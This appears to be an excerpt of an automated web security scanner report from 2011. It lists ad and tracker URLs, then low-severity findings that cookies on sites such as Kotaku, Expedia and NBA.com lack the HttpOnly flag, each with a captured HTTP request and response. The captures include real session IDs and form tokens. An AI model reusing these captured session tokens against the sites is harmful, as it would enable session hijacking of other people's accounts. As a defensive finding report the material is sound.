http://tags.bluekai.com/site/2731
http://tags.bluekai.com/site/2736
http://tags.bluekai.com/site/3113
http://tags.bluekai.com/site/353
http://tap.rubiconproject.com/oz/feeds/targus/profile
http://tap.rubiconproject.com/oz/sensor
http://tap.rubiconproject.com/partner/agent/rubicon/channels.js
http://tiger.vizu.com/a.gif
http://timecom.122.2o7.net/b/ss/timecom/1/H.20.2/s79694016552530
http://tr.adinterax.com/re/mcclatchyinteractive%2CDFW_Y_Star-tel_LB_0222%2CC%3DDFW_Mavericks%2CP%3DDFW-StarTelegram%2CK%3D492697/0.8334790775552392/0/in%2Cti/ti.gif
http://tvfanatic.us.intellitxt.com/intellitxt/front.asp
http://u.openx.net/w/1.0/sc
http://vap3den1.lijit.com/www/delivery/lg.php
http://viacom.adbureau.net/LSERVER/jserver/acc_random=379297/site=mtv.mtvi/aamsz=728x90
http://viacom.adbureau.net/jserver/acc_random=379297/site=mtv.mtvi/aamsz=728x90
http://viamtv.112.2o7.net/b/ss/viamtv/1/H.22.1/s75181884909979
http://viamtv.112.2o7.net/b/ss/viamtv/1/H.22.1/s77238202237058
http://vt.imiclk.com/cgi/vtc.cgi
http://www.burstnet.com/cgi-bin/ads/ad21868w.cgi/v=2.3S/sz=728x90A/14683/NF/RETURN-CODE/JS/
http://www.expedia.com/daily/prod/xmlgrid/loadingImage.asp
http://www.expedia.com/daily/prod/xmlgrid/psf/HotelAndPkgStandard.aspx
http://www.expedia.com/daily/prod/xmlgrid/psf/PsfGridActivities.asp
http://www.expedia.com/daily/promos/deals/summervacationsale/default.asp
http://www.expedia.com/daily/promos/deals/summervacationsale/destination_deals.asp
http://www.expedia.com/daily/promos/doubleclick_ads/summervacationsale/summersale_staffpicks_416x366.asp
http://www.expedia.com/daily/promos/doubleclick_ads/summervacationsale/summersale_top10deals_nyc_308x343.asp
http://www.expedia.com/hotel.h892034.Hotel-Information
http://www.googleadservices.com/pagead/aclk
http://www.imdb.com/title/tt0944947/
http://www.lijit.com/beacon
http://www.tiqiq.com/Tiqiq/PublisherHomePage.aspx
http://www.tiqiq.com/WebServices/EventsData.asmx/LogUserAction
http://www.wtp101.com/admeld_sync
http://www.wtp101.com/cox_sync
http://www22.glam.com/cTagsImgCmd.act

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.

13.1. http://ads.adxpose.com/ads/ads.js previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://ads.adxpose.com
Path:	/ads/ads.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=BCA5F935575F50D636108B69A9EDBDD3; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ads/ads.js?uid=KxwltwQfcXn0PkkN_1000014620118 HTTP/1.1
Host: ads.adxpose.com
Proxy-Connection: keep-alive
Referer: http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=6805757a-ba62-4ca3-815c-dec40d38f03a

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=BCA5F935575F50D636108B69A9EDBDD3; Path=/
ETag: "0-gzip"
Cache-Control: must-revalidate, max-age=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 13 Jun 2011 11:02:01 GMT
Connection: close

if(typeof __ADXPOSE_CONTAINERS__==="undefined"){__ADXPOSE_CONTAINERS__={}}if(typeof __ADXPOSE_EVENT_QUEUES__==="undefined"){__ADXPOSE_EVENT_QUEUES__={}}if(typeof __adxpose__getOffset__==="undefined"){
...[SNIP]...

13.2. http://dg.specificclick.net/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://dg.specificclick.net
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=8b4d6afb4337ac924f637d1c3cb3; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /?y=3&t=h&u=http%3A%2F%2Fwww.mavsmoneyball.com%2F2011%2F6%2F12%2F2220848%2Fnba-finals-2011-dallas-mavericks-win-their-first-ever-championship&r= HTTP/1.1
Host: dg.specificclick.net
Proxy-Connection: keep-alive
Referer: http://www.mavsmoneyball.com/2011/6/12/2220848/nba-finals-2011-dallas-mavericks-win-their-first-ever-championship
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adp=7qHV^0^3; smdmp=7qEy:811200901^7qEy:1; adf=7qHV^0^0; ug=FiMiv7kDK4v9CD

Response

HTTP/1.1 200 OK
Server: WebStar 1.0
Cache-Control: no-store,no-cache,must-revalidate,post-check=0,pre-check=0
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: JSESSIONID=8b4d6afb4337ac924f637d1c3cb3; Path=/
Content-Type: text/html;charset=ISO-8859-1
Date: Mon, 13 Jun 2011 11:13:30 GMT
Vary: Accept-Encoding
Content-Length: 569
Connection: Keep-Alive

<html><body> <script> var _comscore = _comscore || []; _comscore.push({ c1: "8", c2: "2101" ,c3: "1234567891234567891" }); (function() { var s = document.createElement("script"), el = docume
...[SNIP]...

13.3. http://event.adxpose.com/event.flow previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://event.adxpose.com
Path:	/event.flow

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=505ACACA6FC5F2EEEF3530B75B874EE4; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /event.flow?eventcode=000_000_12&location=http%3A%2F%2Fthesouthern.com%2Fsports%2Fbasketball%2Farticle_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html&uid=KxwltwQfcXn0PkkN_1000014620118&xy=44%2C2676&wh=1065%2C926&vchannel=Centro&cid=Zenith-Sonic&iad=1307962922145-25851937336847188&cookieenabled=1&screenwh=1920%2C1200&adwh=728%2C90&colordepth=32&flash=10.3&iframed=0 HTTP/1.1
Host: event.adxpose.com
Proxy-Connection: keep-alive
Referer: http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=6805757a-ba62-4ca3-815c-dec40d38f03a

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=505ACACA6FC5F2EEEF3530B75B874EE4; Path=/
Cache-Control: no-store
Content-Type: text/javascript;charset=UTF-8
Content-Length: 111
Date: Mon, 13 Jun 2011 11:02:02 GMT
Connection: close

if (typeof __ADXPOSE_EVENT_QUEUES__ !== "undefined") __ADXPOSE_DRAIN_QUEUE__("KxwltwQfcXn0PkkN_1000014620118");

13.4. http://fansided.com/category/nba previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://fansided.com
Path:	/category/nba

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=9151522dc10d420f8f472941ef0f1ba9; path=/
w3tc_referrer=http%3A%2F%2Fsportdfw.com%2Faboutcontact-us%2F; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /category/nba HTTP/1.1
Host: fansided.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/aboutcontact-us/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 301 Moved Permanently
Date: Mon, 13 Jun 2011 11:13:49 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 Phusion_Passenger/2.2.15 mod_bwlimited/1.4 PHP/5.2.15
Vary: Accept-Encoding,User-Agent
X-Powered-By: W3 Total Cache/0.9.1.4b
Set-Cookie: w3tc_referrer=http%3A%2F%2Fsportdfw.com%2Faboutcontact-us%2F; path=/
Set-Cookie: PHPSESSID=9151522dc10d420f8f472941ef0f1ba9; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://fansided.com/xmlrpc.php
Location: http://fansided.com/category/nba/
Content-Length: 0
Content-Type: text/html; charset=UTF-8

13.5. http://idolator.com/favicon.ico previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://idolator.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=c489d4009ebc793736408e674190920c; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: idolator.com
Proxy-Connection: keep-alive
Referer: http://moviesblog.mtv.com/2011/06/12/game-of-thrones-spoiler-death-sean-bean/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Mon, 13 Jun 2011 11:18:25 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 11:18:25 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Set-Cookie: PHPSESSID=c489d4009ebc793736408e674190920c; path=/
Location: http://idolator.com/wp-content/themes/idolator_1.5/images/favicon.ico
Content-Length: 0
Content-Type: text/html; charset=UTF-8

13.6. http://kotaku.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://kotaku.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

SESSID_GANJA_hihvlpkf05v94s50dg0dnk9gi4_REVOL=deleted; expires=Sun, 13-Jun-2010 11:22:54 GMT; path=/; domain=.kotaku.com
SESSID_GANJA_hihvlpkf05v94s50dg0dnk9gi4_CHKSUM=deleted; expires=Sun, 13-Jun-2010 11:22:54 GMT; path=/; domain=.kotaku.com
____GSV=dynamic; expires=Wed, 13-Jul-2011 11:22:55 GMT; path=/; domain=.kotaku.com
GANJAFORCEVIEW=deleted; expires=Sun, 13-Jun-2010 11:22:54 GMT; path=/; domain=.kotaku.com
GANJAFORCEVIEWDIR=deleted; expires=Sun, 13-Jun-2010 11:22:54 GMT; path=/; domain=.kotaku.com
GANJAVIEW=deleted; expires=Sun, 13-Jun-2010 11:22:54 GMT; path=/; domain=.kotaku.com
GANJAUSERSETTINGS=deleted; expires=Sun, 13-Jun-2010 11:22:54 GMT; path=/
GANJAUSERSETTINGS=a%3A1%3A%7Bs%3A3%3A%22css%22%3BN%3B%7D; path=/; domain=.kotaku.com

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /?op=ajax_userstate&r=43127 HTTP/1.1
Host: kotaku.com
Proxy-Connection: keep-alive
Referer: http://kotaku.com/5811225/a-game-of-thrones-isnt-a-game-at-all-without-sean-bean
Content-Length: 42
Origin: http://kotaku.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ____GSV=dynamic; form_token=2657e8908f9ae46a1cb78d3013a193f8; SESSID_GANJA=hihvlpkf05v94s50dg0dnk9gi4; GANJAUSERSETTINGS=a%3A1%3A%7Bs%3A3%3A%22css%22%3BN%3B%7D; SESSID_GANJA_hihvlpkf05v94s50dg0dnk9gi4_CHK=ae7933c35d3c68f4a0f97840c7da1fc8; usrev=43127

formToken=2657e8908f9ae46a1cb78d3013a193f8

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:22:55 GMT
Server: Apache
X-Cookie-Set: 1
Set-Cookie: ____GSV=dynamic; expires=Wed, 13-Jul-2011 11:22:55 GMT; path=/; domain=.kotaku.com
Set-Cookie: GANJAFORCEVIEW=deleted; expires=Sun, 13-Jun-2010 11:22:54 GMT; path=/; domain=.kotaku.com
Set-Cookie: GANJAFORCEVIEWDIR=deleted; expires=Sun, 13-Jun-2010 11:22:54 GMT; path=/; domain=.kotaku.com
Set-Cookie: GANJAVIEW=deleted; expires=Sun, 13-Jun-2010 11:22:54 GMT; path=/; domain=.kotaku.com
Set-Cookie: GANJAUSERSETTINGS=deleted; expires=Sun, 13-Jun-2010 11:22:54 GMT; path=/
Set-Cookie: GANJAUSERSETTINGS=a%3A1%3A%7Bs%3A3%3A%22css%22%3BN%3B%7D; path=/; domain=.kotaku.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=30
Pragma: no-cache
Set-Cookie: ad_url_login=0; path=/; domain=.kotaku.com
Set-Cookie: ad_url_commenter=0; path=/; domain=.kotaku.com
Set-Cookie: ad_url_star=0; path=/; domain=.kotaku.com
Set-Cookie: SESSID_GANJA_hihvlpkf05v94s50dg0dnk9gi4_DATA=mail2token%7Ca%3A2%3A%7Bs%3A5%3A%22token%22%3Bs%3A32%3A%22caef169ea33f9161e11e811e0800d865%22%3Bs%3A4%3A%22time%22%3Bi%3A1307964175%3B%7D; path=/; domain=.kotaku.com; httponly
Set-Cookie: SESSID_GANJA_hihvlpkf05v94s50dg0dnk9gi4_CHK=4ba381ce446e13a7f6168dd27270fff4; path=/; domain=.kotaku.com; httponly
Set-Cookie: SESSID_GANJA_hihvlpkf05v94s50dg0dnk9gi4_REVOL=deleted; expires=Sun, 13-Jun-2010 11:22:54 GMT; path=/; domain=.kotaku.com
Set-Cookie: SESSID_GANJA_hihvlpkf05v94s50dg0dnk9gi4_CHKSUM=deleted; expires=Sun, 13-Jun-2010 11:22:54 GMT; path=/; domain=.kotaku.com
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
GawkerApplicationHost: Ganja
GawkerHost: GM67 - Request took D=30394 at t=1307964175242073 on site kotaku.com (live)
GawkerApplication: ganja
Cteonnt-Length: 254
Content-Type: text/html; charset=utf-8;
Content-Length: 254

{"action":"userstate","success":false,"geoip":"US","now":1307964175,"site":{"siteId":"9","facebook_connect":{"enabled":true},"canonicalHost":"kotaku.com","newCommentAutoCheck":{"enabled":false,"timer"
...[SNIP]...

13.7. http://kotaku.com/index.php previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://kotaku.com
Path:	/index.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

SESSID_GANJA_hihvlpkf05v94s50dg0dnk9gi4_REVOL=deleted; expires=Sun, 13-Jun-2010 11:23:21 GMT; path=/; domain=.kotaku.com
SESSID_GANJA_hihvlpkf05v94s50dg0dnk9gi4_CHKSUM=deleted; expires=Sun, 13-Jun-2010 11:23:21 GMT; path=/; domain=.kotaku.com
GANJAFORCEVIEW=deleted; expires=Sun, 13-Jun-2010 11:23:21 GMT; path=/; domain=.kotaku.com
GANJAFORCEVIEWDIR=deleted; expires=Sun, 13-Jun-2010 11:23:21 GMT; path=/; domain=.kotaku.com
GANJAVIEW=deleted; expires=Sun, 13-Jun-2010 11:23:21 GMT; path=/; domain=.kotaku.com
GANJAUSERSETTINGS=deleted; expires=Sun, 13-Jun-2010 11:23:21 GMT; path=/
GANJAUSERSETTINGS=a%3A1%3A%7Bs%3A3%3A%22css%22%3BN%3B%7D; path=/; domain=.kotaku.com

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /index.php HTTP/1.1
Host: kotaku.com
Proxy-Connection: keep-alive
Referer: http://kotaku.com/5811225/a-game-of-thrones-isnt-a-game-at-all-without-sean-bean
Content-Length: 142
Origin: http://kotaku.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: form_token=2657e8908f9ae46a1cb78d3013a193f8; SESSID_GANJA=hihvlpkf05v94s50dg0dnk9gi4; usrev=43127; ganjaPostlistView=false; __qca=P0-1910528491-1307963900267; ____GSV=dynamic; GANJAUSERSETTINGS=a%3A1%3A%7Bs%3A3%3A%22css%22%3BN%3B%7D; ad_url_login=0; ad_url_commenter=0; ad_url_star=0; SESSID_GANJA_hihvlpkf05v94s50dg0dnk9gi4_DATA=mail2token%7Ca%3A2%3A%7Bs%3A5%3A%22token%22%3Bs%3A32%3A%228e63e5a4b1a3ef859caf7e001b06aec6%22%3Bs%3A4%3A%22time%22%3Bi%3A1307963363%3B%7D; SESSID_GANJA_hihvlpkf05v94s50dg0dnk9gi4_CHK=31955d712532c281244ff18495a6c63d; welcome-box_count=1; interstitial_count=1; __utmz=153847911.1307963900.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=153847911.155554980.1307963900.1307963900.1307963900.1; __utmc=153847911; __utmb=153847911.1.10.1307963900; __g_iut=1307963904980; _chartbeat2=e1yns63z64wh592f

op=threadlist&post_id=5811225&priority=1&mode=featured&page=0&repliesmode=show&selected_thread=null&formToken=2657e8908f9ae46a1cb78d3013a193f8

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:23:22 GMT
Server: Apache
X-Cookie-Set: 1
Set-Cookie: GANJAFORCEVIEW=deleted; expires=Sun, 13-Jun-2010 11:23:21 GMT; path=/; domain=.kotaku.com
Set-Cookie: GANJAFORCEVIEWDIR=deleted; expires=Sun, 13-Jun-2010 11:23:21 GMT; path=/; domain=.kotaku.com
Set-Cookie: GANJAVIEW=deleted; expires=Sun, 13-Jun-2010 11:23:21 GMT; path=/; domain=.kotaku.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=30
Pragma: no-cache
Set-Cookie: GANJAUSERSETTINGS=deleted; expires=Sun, 13-Jun-2010 11:23:21 GMT; path=/
Set-Cookie: GANJAUSERSETTINGS=a%3A1%3A%7Bs%3A3%3A%22css%22%3BN%3B%7D; path=/; domain=.kotaku.com
Set-Cookie: SESSID_GANJA_hihvlpkf05v94s50dg0dnk9gi4_DATA=mail2token%7Ca%3A2%3A%7Bs%3A5%3A%22token%22%3Bs%3A32%3A%228e63e5a4b1a3ef859caf7e001b06aec6%22%3Bs%3A4%3A%22time%22%3Bi%3A1307963363%3B%7D; path=/; domain=.kotaku.com; httponly
Set-Cookie: SESSID_GANJA_hihvlpkf05v94s50dg0dnk9gi4_CHK=31955d712532c281244ff18495a6c63d; path=/; domain=.kotaku.com; httponly
Set-Cookie: SESSID_GANJA_hihvlpkf05v94s50dg0dnk9gi4_REVOL=deleted; expires=Sun, 13-Jun-2010 11:23:21 GMT; path=/; domain=.kotaku.com
Set-Cookie: SESSID_GANJA_hihvlpkf05v94s50dg0dnk9gi4_CHKSUM=deleted; expires=Sun, 13-Jun-2010 11:23:21 GMT; path=/; domain=.kotaku.com
X-JSON: ({"action":"threadlist","success":true,"priority":1,"pager":true,"selected_thread":"null"})
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
GawkerApplicationHost: Ganja
GawkerHost: GM57 - Request took D=37809 at t=1307964202007883 on site kotaku.com (live)
GawkerApplication: ganja
Content-Type: text/html; charset=utf-8;
Content-Length: 22377

   <div class="thread t_40015744 grid-bleed">

<div class="comment cid_40015744 aid_2564024 p_1 cstarter">


   <div class="header">
       <div class="byline">

   <a title="JesusChrist" href="/people/El
...[SNIP]...

13.8. http://www.expedia.com/New-York-Hotels-Millenium-Hilton.h892034.Hotel-Information previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.expedia.com
Path:	/New-York-Hotels-Millenium-Hilton.h892034.Hotel-Information

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSION=ed77ff0b-ce9e-439e-a470-a8216bfecaab; Domain=.expedia.com; Path=/
SSRT1=E_T1TQE; path=/; domain=.expedia.com; expires=Tue, 12-Jun-2012 11:27:15 GMT
p1=`tpid=v.1,1`airp=v.1,WAS`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`76; Domain=.expedia.com; Expires=Sun, 12-Jun-2016 16:31:10 GMT; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.9. http://www.nba.com/mavericks/index_main.html previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.nba.com
Path:	/mavericks/index_main.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=2ECC4939FA4E7E07CA52A11436392FBB; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mavericks/index_main.html HTTP/1.1
Host: www.nba.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adDEmas=R00&broadband&softlayer.com&0&usa&523&05672&46&09&T1&M1&7029&; adDEon=true; s_cc=true; s_vi=[CS]v1|26FAF7070501327A-60000100E0022607[CE]; s_sq=%5B%5BB%5D%5D

Response

13.10. http://www.tripadvisor.com/img/cdsi/img2/ratings/partner/e4.0-13878-5.gif previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.tripadvisor.com
Path:	/img/cdsi/img2/ratings/partner/e4.0-13878-5.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

TASession=%1%V2ID.454F90E0D905C94A0FC63D5ED96F1B89*SQ.1*MC.13878*GR.92*TBR.99*EXEX.21*ABTR.38*HS.popularity*ES.popularity*AS.popularity*DS.5*FP.CDSimp*RP.http%3A%2F%2Fwww%5C.expedia%5C.com%2FNew-York-Hotels-Millenium-Hilton%5C.h892034%5C.Hotel-Information%3Fchkin%3D7%252F14%252F2011%26hashTag%3Ddefault%26chkout%3D7%252F18%252F2011%26mcicid%3D112321680%26rm1%3Da2*TRA.true; Domain=.tripadvisor.com; Path=/
TAUnique=%1%enc%3AwEcEovk4vltd8LGI8QbYY0XbcR4szT2MJgwhg4A2d7o7HKcBniyy%2FA%3D%3D; Domain=.tripadvisor.com; Expires=Thu, 10-Jun-2021 11:21:54 GMT; Path=/
TACds=A.1.13878.5.2011-06-12; Domain=.tripadvisor.com; Expires=Fri, 12-Aug-2011 11:21:54 GMT; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.11. http://www.ugo.com/takeover/takeover.html previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.ugo.com
Path:	/takeover/takeover.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

cgi-session-id=1C1A17FE-95AF-11E0-8394-637A246AE2AD; path=/
cgi-session-id=1C1A17FE-95AF-11E0-8394-637A246AE2AD; path=/

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /takeover/takeover.html?site_zone=ugo.ugo.tv/tv-index&pt=news&pos=takeover&sz=800x600&dev=true HTTP/1.1
Host: www.ugo.com
Proxy-Connection: keep-alive
Referer: http://www.ugo.com/tv/game-of-thrones-baelor-preview
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _vaTC=uuid=-1&cId=SaUUUk&track=true&sendSess=true&seq=1&intEngTimeReport=15000&lastAccess=1307963897233; _vaHC=holdout=false; __utmz=240756231.1307963898.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=240756231.1048793645.1307963898.1307963898.1307963898.1; __utmc=240756231; cgi-session-id=D80F9AFC-95AE-11E0-BE9D-D369F07B4D76; __utmb=240756231.1.10.1307963898; UGOwelcome=welcomeMat:1

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:20:14 GMT
Server: Apache
Set-Cookie: cgi-session-id=1C1A17FE-95AF-11E0-8394-637A246AE2AD; path=/
Set-Cookie: cgi-session-id=1C1A17FE-95AF-11E0-8394-637A246AE2AD; path=/
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html
Content-Length: 2638

<html>
<head><title>UGO Takeover Ad</title>
<script type="text/javascript" language="javascript">
function returnToRequestedPage() { setTimeout('parent.ShowContent();', 250); }
function gqp( name )
...[SNIP]...

13.12. http://www.ugo.com/takeover/takeover.js previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.ugo.com
Path:	/takeover/takeover.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

cgi-session-id=D80F9AFC-95AE-11E0-BE9D-D369F07B4D76; path=/
cgi-session-id=D80F9AFC-95AE-11E0-BE9D-D369F07B4D76; path=/

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /takeover/takeover.js HTTP/1.1
Host: www.ugo.com
Proxy-Connection: keep-alive
Referer: http://www.ugo.com/tv/game-of-thrones-baelor-preview
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cgi-session-id=CEADD88E-95AE-11E0-BF5A-4CC41DBFF5A0; _vaTC=uuid=-1&cId=SaUUUk&track=true&sendSess=true&seq=1&intEngTimeReport=15000&lastAccess=1307963897233; _vaHC=holdout=false

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:18:20 GMT
Server: Apache
Set-Cookie: cgi-session-id=D80F9AFC-95AE-11E0-BE9D-D369F07B4D76; path=/
Set-Cookie: cgi-session-id=D80F9AFC-95AE-11E0-BE9D-D369F07B4D76; path=/
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: application/x-javascript
Content-Length: 6185

var TYPE = 1; //1 is minutesToLive and 2 is count
var TIMELIMIT = 60; // happen every TIMELIMIT minutes when TYPE = 1
var FREQUENCY = 2; // happen every FREQUENCY times when TYPE = 2

if (typeof(takeo
...[SNIP]...

13.13. http://a.tribalfusion.com/i.cid previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/i.cid

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

